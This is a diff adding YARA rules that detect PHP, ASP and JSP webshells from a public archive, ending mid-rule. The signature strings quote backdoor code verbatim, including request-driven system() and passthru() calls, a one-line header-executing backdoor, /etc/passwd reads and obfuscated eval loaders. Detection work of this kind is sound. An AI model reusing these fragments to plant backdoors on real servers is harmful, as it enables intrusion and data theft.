+		description = "PHP Webshells Github Archive - file c99_madnet.php"
+		author = "Florian Roth"
+		hash = "17613df393d0a99fd5bea18b2d4707f566cff219"
+	strings:
+		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+		$s1 = "eval(gzinflate(base64_decode('"
+		$s2 = "$pass = \"pass\";  //Pass" fullword
+		$s3 = "$login = \"user\"; //Login" fullword
+		$s4 = "             //Authentication" fullword
+	condition:
+		all of them
+}
+rule WebShell_c99_locus7s {
+	meta:
+		description = "PHP Webshells Github Archive - file c99_locus7s.php"
+		author = "Florian Roth"
+		hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"
+	strings:
+		$s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
+		$s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"
+		$s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"
+		$s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
+		$s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
+	condition:
+		2 of them
+}
+rule WebShell_JspWebshell_1_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
+		author = "Florian Roth"
+		hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"
+	strings:
+		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+		$s1 = "String password=request.getParameter(\"password\");" fullword
+		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+		$s7 = "String editfile=request.getParameter(\"editfile\");" fullword
+		$s8 = "//String tempfilename=request.getParameter(\"file\");" fullword
+		$s12 = "password = (String)session.getAttribute(\"password\");" fullword
+	condition:
+		3 of them
+}
+rule WebShell_safe0ver {
+	meta:
+		description = "PHP Webshells Github Archive - file safe0ver.php"
+		author = "Florian Roth"
+		hash = "366639526d92bd38ff7218b8539ac0f154190eb8"
+	strings:
+		$s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword
+		$s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword
+		$s5 = "else { /* <!-- Then it must be a File... --> */" fullword
+		$s7 = "$contents .= htmlentities( $line ) ;" fullword
+		$s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword
+		$s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+		$s20 = "/* <!-- End of Actions --> */" fullword
+	condition:
+		3 of them
+}
+rule WebShell_Uploader {
+	meta:
+		description = "PHP Webshells Github Archive - file Uploader.php"
+		author = "Florian Roth"
+		hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"
+	strings:
+		$s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+	condition:
+		all of them
+}
+rule WebShell_php_webshells_kral {
+	meta:
+		description = "PHP Webshells Github Archive - file kral.php"
+		author = "Florian Roth"
+		hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"
+	strings:
+		$s1 = "$adres=gethostbyname($ip);" fullword
+		$s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword
+		$s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword
+		$s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword
+		$s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"
+		$s20 = "<p><strong>Server listeleyici</strong><br />" fullword
+	condition:
+		2 of them
+}
+rule WebShell_cgitelnet {
+	meta:
+		description = "PHP Webshells Github Archive - file cgitelnet.php"
+		author = "Florian Roth"
+		hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"
+	strings:
+		$s9 = "# Author Homepage: http://www.rohitab.com/" fullword
+		$s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword
+		$s18 = "# in a command line on Windows NT." fullword
+		$s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_simple_backdoor {
+	meta:
+		description = "PHP Webshells Github Archive - file simple-backdoor.php"
+		author = "Florian Roth"
+		hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"
+	strings:
+		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s3 = "        echo \"</pre>\";" fullword
+		$s4 = "        $cmd = ($_REQUEST['cmd']);" fullword
+		$s5 = "        echo \"<pre>\";" fullword
+		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s7 = "        die;" fullword
+		$s8 = "        system($cmd);" fullword
+	condition:
+		all of them
+}
+rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		author = "Florian Roth"
+		hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"
+	strings:
+		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+		$s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword
+		$s4 = "$v = @ini_get(\"open_basedir\");" fullword
+		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+	condition:
+		2 of them
+}
+rule WebShell_NTDaddy_v1_9 {
+	meta:
+		description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"
+		author = "Florian Roth"
+		hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"
+	strings:
+		$s2 = "|     -obzerve : mr_o@ihateclowns.com |" fullword
+		$s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+		$s13 = "<form action=ntdaddy.asp method=post>" fullword
+		$s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword
+	condition:
+		2 of them
+}
+rule WebShell_lamashell {
+	meta:
+		description = "PHP Webshells Github Archive - file lamashell.php"
+		author = "Florian Roth"
+		hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"
+	strings:
+		$s0 = "if(($_POST['exe']) == \"Execute\") {" fullword
+		$s8 = "$curcmd = $_POST['king'];" fullword
+		$s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword
+		$s18 = "<title>lama's'hell v. 3.0</title>" fullword
+		$s19 = "_|_  O    _    O  _|_" fullword
+		$s20 = "$curcmd = \"ls -lah\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Simple_PHP_backdoor_by_DK {
+	meta:
+		description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"
+		author = "Florian Roth"
+		hash = "03f6215548ed370bec0332199be7c4f68105274e"
+	strings:
+		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s8 = "system($cmd);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT {
+	meta:
+		description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"
+		author = "Florian Roth"
+		hash = "31e5473920a2cc445d246bc5820037d8fe383201"
+	strings:
+		$s4 = "$content = chunk_split(base64_encode($content)); " fullword
+		$s12 = "print \"Sending mail to $to....... \"; " fullword
+		$s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword
+	condition:
+		all of them
+}
+rule WebShell_C99madShell_v__2_0_madnet_edition {
+	meta:
+		description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"
+		author = "Florian Roth"
+		hash = "f99f8228eb12746847f54bad45084f19d1a7e111"
+	strings:
+		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+		$s1 = "eval(gzinflate(base64_decode('"
+		$s2 = "$pass = \"\";  //Pass" fullword
+		$s3 = "$login = \"\"; //Login" fullword
+		$s4 = "//Authentication" fullword
+	condition:
+		all of them
+}
+rule WebShell_CmdAsp_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"
+		author = "Florian Roth"
+		hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"
+	strings:
+		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+		$s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword
+		$s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword
+		$s6 = "' --------------------o0o--------------------" fullword
+		$s8 = "' File: CmdAsp.asp" fullword
+		$s11 = "<-- CmdAsp.asp -->" fullword
+		$s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+		$s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
+		$s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+	condition:
+		4 of them
+}
+rule WebShell_NCC_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file NCC-Shell.php"
+		author = "Florian Roth"
+		hash = "64d4495875a809b2730bd93bec2e33902ea80a53"
+	strings:
+		$s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword
+		$s1 = "<b>--Coded by Silver" fullword
+		$s2 = "<title>Upload - Shell/Datei</title>" fullword
+		$s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><"
+		$s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword
+		$s18 = "printf(\"Sie ist %u Bytes gro" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_README {
+	meta:
+		description = "PHP Webshells Github Archive - file README.md"
+		author = "Florian Roth"
+		hash = "ef2c567b4782c994db48de0168deb29c812f7204"
+	strings:
+		$s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
+		$s1 = "php-webshells" fullword
+	condition:
+		all of them
+}
+rule WebShell_backupsql {
+	meta:
+		description = "PHP Webshells Github Archive - file backupsql.php"
+		author = "Florian Roth"
+		hash = "863e017545ec8e16a0df5f420f2d708631020dd4"
+	strings:
+		$s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."
+		$s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+		$s2 = "* as email attachment, or send to a remote ftp server by" fullword
+		$s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword
+		$s17 = "$from    = \"Neu-Cool@email.com\";  // Who should the emails be sent from?, may "
+	condition:
+		2 of them
+}
+rule WebShell_AK_74_Security_Team_Web_Shell_Beta_Version {
+	meta:
+		description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
+		author = "Florian Roth"
+		hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"
+	strings:
+		$s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
+		$s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."
+		$s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_php_webshells_cpanel {
+	meta:
+		description = "PHP Webshells Github Archive - file cpanel.php"
+		author = "Florian Roth"
+		hash = "433dab17106b175c7cf73f4f094e835d453c0874"
+	strings:
+		$s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword
+		$s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword
+		$s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword
+		$s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword
+		$s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"
+		$s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword
+	condition:
+		2 of them
+}
+rule WebShell_accept_language {
+	meta:
+		description = "PHP Webshells Github Archive - file accept_language.php"
+		author = "Florian Roth"
+		hash = "180b13576f8a5407ab3325671b63750adbcb62c9"
+	strings:
+		$s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
+	condition:
+		all of them
+}
+rule WebShell_php_webshells_529 {
+	meta:
+		description = "PHP Webshells Github Archive - file 529.php"
+		author = "Florian Roth"
+		hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"
+	strings:
+		$s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword
+		$s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"
+		$s9 = "echo '<PRE><P>This is exploit from <a " fullword
+		$s10 = "This Exploit Was Edited By KingDefacer" fullword
+		$s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword
+		$s14 = "$hardstyle = explode(\"/\", $file); " fullword
+		$s20 = "while($level--) chdir(\"..\"); " fullword
+	condition:
+		2 of them
+}
+rule WebShell_STNC_WebShell_v0_8 {
+	meta:
+		description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
+		author = "Florian Roth"
+		hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"
+	strings:
+		$s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
+		$s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"
+		$s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_tryag {
+	meta:
+		description = "PHP Webshells Github Archive - file tryag.php"
+		author = "Florian Roth"
+		hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"
+	strings:
+		$s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword
+		$s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword
+		$s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword
+		$s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword
+		$s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"
+	condition:
+		3 of them
+}
+rule WebShell_dC3_Security_Crew_Shell_PRiV_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"
+		author = "Florian Roth"
+		hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"
+	strings:
+		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+		$s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword
+		$s13 = "header(\"Content-type: image/gif\");" fullword
+		$s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword
+		$s20 = "if (isset($_GET['rename_all'])) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_qsd_php_backdoor {
+	meta:
+		description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"
+		author = "Florian Roth"
+		hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"
+	strings:
+		$s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"
+		$s2 = "if(isset($_POST[\"newcontent\"]))" fullword
+		$s3 = "foreach($parts as $val)//Assemble the path back together" fullword
+		$s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_spygrup {
+	meta:
+		description = "PHP Webshells Github Archive - file spygrup.php"
+		author = "Florian Roth"
+		hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"
+	strings:
+		$s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword
+		$s6 = "if($_POST['root']) $root = $_POST['root'];" fullword
+		$s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword
+		$s18 = "By KingDefacer From Spygrup.org>" fullword
+	condition:
+		3 of them
+}
+rule WebShell_Web_shell__c_ShAnKaR {
+	meta:
+		description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
+		author = "Florian Roth"
+		hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"
+	strings:
+		$s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
+		$s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"
+		$s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
+		$s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz {
+	meta:
+		description = "PHP Webshells Github Archive - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php"
+		author = "Florian Roth"
+		hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"
+	strings:
+		$s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword
+		$s11 = "directory... Trust me - it works :-) */" fullword
+		$s15 = "/* ls looks much better with ' -F', IMHO. */" fullword
+		$s16 = "} else if ($command == 'ls') {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_Gamma_Web_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
+		author = "Florian Roth"
+		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
+	strings:
+		$s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword
+		$s8 = "### Gamma Group <http://www.gammacenter.com>" fullword
+		$s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword
+		$s20 = "my $command = $self->query('command');" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_aspydrv {
+	meta:
+		description = "PHP Webshells Github Archive - file aspydrv.php"
+		author = "Florian Roth"
+		hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"
+	strings:
+		$s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files"
+		$s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
+		$s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
+		$s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
+		$s20 = "' ---Copy Too Folder routine Start" fullword
+	condition:
+		3 of them
+}
+rule WebShell_JspWebshell_1_2_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
+		author = "Florian Roth"
+		hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"
+	strings:
+		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+		$s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
+		$s15 = "endPoint=random1.getFilePointer();" fullword
+		$s20 = "if (request.getParameter(\"command\") != null) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_g00nshell_v1_3 {
+	meta:
+		description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
+		author = "Florian Roth"
+		hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"
+	strings:
+		$s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
+		$s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
+		$s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
+		$s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
+		$s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
+	condition:
+		2 of them
+}
+rule WebShell_WinX_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file WinX Shell.php"
+		author = "Florian Roth"
+		hash = "a94d65c168344ad9fa406d219bdf60150c02010e"
+	strings:
+		$s4 = "// It's simple shell for all Win OS." fullword
+		$s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword
+		$s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword
+		$s13 = "// Created by greenwood from n57" fullword
+		$s20 = " if (is_uploaded_file($userfile)) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_PHANTASMA {
+	meta:
+		description = "PHP Webshells Github Archive - file PHANTASMA.php"
+		author = "Florian Roth"
+		hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"
+	strings:
+		$s12 = "\"    printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword
+		$s15 = "if ($portscan != \"\") {" fullword
+		$s16 = "echo \"<br>Banner: $get <br><br>\";" fullword
+		$s20 = "$dono = get_current_user( );" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_cw {
+	meta:
+		description = "PHP Webshells Github Archive - file cw.php"
+		author = "Florian Roth"
+		hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"
+	strings:
+		$s1 = "// Dump Database [pacucci.com]" fullword
+		$s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword
+		$s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword
+		$s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"
+		$s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword
+		$s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_include_w_shell {
+	meta:
+		description = "PHP Webshells Github Archive - file php-include-w-shell.php"
+		author = "Florian Roth"
+		hash = "1a7f4868691410830ad954360950e37c582b0292"
+	strings:
+		$s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
+		$s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
+		$s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
+	condition:
+		1 of them
+}
+rule WebShell_mysql_tool {
+	meta:
+		description = "PHP Webshells Github Archive - file mysql_tool.php"
+		author = "Florian Roth"
+		hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"
+	strings:
+		$s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword
+		$s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_PhpSpy_Ver_2006 {
+	meta:
+		description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
+		author = "Florian Roth"
+		hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"
+	strings:
+		$s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword
+		$s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+		$s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32"
+		$s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'"
+	condition:
+		1 of them
+}
+rule WebShell_ZyklonShell {
+	meta:
+		description = "PHP Webshells Github Archive - file ZyklonShell.php"
+		author = "Florian Roth"
+		hash = "3fa7e6f3566427196ac47551392e2386a038d61c"
+	strings:
+		$s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword
+		$s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword
+		$s2 = "<TITLE>404 Not Found</TITLE>" fullword
+		$s3 = "<H1>Not Found</H1>" fullword
+	condition:
+		all of them
+}
+rule WebShell_php_webshells_myshell {
+	meta:
+		description = "PHP Webshells Github Archive - file myshell.php"
+		author = "Florian Roth"
+		hash = "5bd52749872d1083e7be076a5e65ffcde210e524"
+	strings:
+		$s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu"
+		$s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+		$s15 = "<title>$MyShellVersion - Access Denied</title>" fullword
+		$s16 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT"
+	condition:
+		1 of them
+}
+rule WebShell_php_webshells_lolipop {
+	meta:
+		description = "PHP Webshells Github Archive - file lolipop.php"
+		author = "Florian Roth"
+		hash = "86f23baabb90c93465e6851e40104ded5a5164cb"
+	strings:
+		$s3 = "$commander = $_POST['commander']; " fullword
+		$s9 = "$sourcego = $_POST['sourcego']; " fullword
+		$s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
+	condition:
+		all of them
+}
+rule WebShell_simple_cmd {
+	meta:
+		description = "PHP Webshells Github Archive - file simple_cmd.php"
+		author = "Florian Roth"
+		hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"
+	strings:
+		$s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+		$s2 = "<title>G-Security Webshell</title>" fullword
+		$s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+		$s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_go_shell {
+	meta:
+		description = "PHP Webshells Github Archive - file go-shell.php"
+		author = "Florian Roth"
+		hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"
+	strings:
+		$s0 = "#change this password; for power security - delete this file =)" fullword
+		$s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword
+		$s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword
+		$s12 = "print << \"[kalabanga]\";" fullword
+		$s13 = "<title>GO.cgi</title>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_aZRaiLPhp_v1_0 {
+	meta:
+		description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
+		author = "Florian Roth"
+		hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"
+	strings:
+		$s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED"
+		$s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword
+		$s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword
+		$s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword
+	condition:
+		2 of them
+}
+rule WebShell_webshells_zehir4 {
+	meta:
+		description = "Webshells Github Archive - file zehir4"
+		author = "Florian Roth"
+		hash = "788928ae87551f286d189e163e55410acbb90a64"
+		score = 55
+	strings:
+		$s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword
+		$s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com"
+	condition:
+		1 of them
+}
+rule WebShell_zehir4_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"
+		author = "Florian Roth"
+		hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"
+	strings:
+		$s4 = "response.Write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&"
+		$s11 = "frames.byZehir.document.execCommand("
+		$s15 = "frames.byZehir.document.execCommand(co"
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_lostDC {
+	meta:
+		description = "PHP Webshells Github Archive - file lostDC.php"
+		author = "Florian Roth"
+		hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"
+	strings:
+		$s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword
+		$s4 = "header ( \"Content-Description: Download manager\" );" fullword
+		$s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second"
+		$s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword
+		$s12 = "$ret = shellexec($command);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_CasuS_1_5 {
+	meta:
+		description = "PHP Webshells Github Archive - file CasuS 1.5.php"
+		author = "Florian Roth"
+		hash = "7eee8882ad9b940407acc0146db018c302696341"
+	strings:
+		$s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"
+		$s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword
+		$s18 = "if (file_exists(\"F:\\\\\")){" fullword
+	condition:
+		1 of them
+}
+rule WebShell_ftpsearch {
+	meta:
+		description = "PHP Webshells Github Archive - file ftpsearch.php"
+		author = "Florian Roth"
+		hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"
+	strings:
+		$s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword
+		$s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword
+		$s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword
+		$s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ {
+	meta:
+		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+	strings:
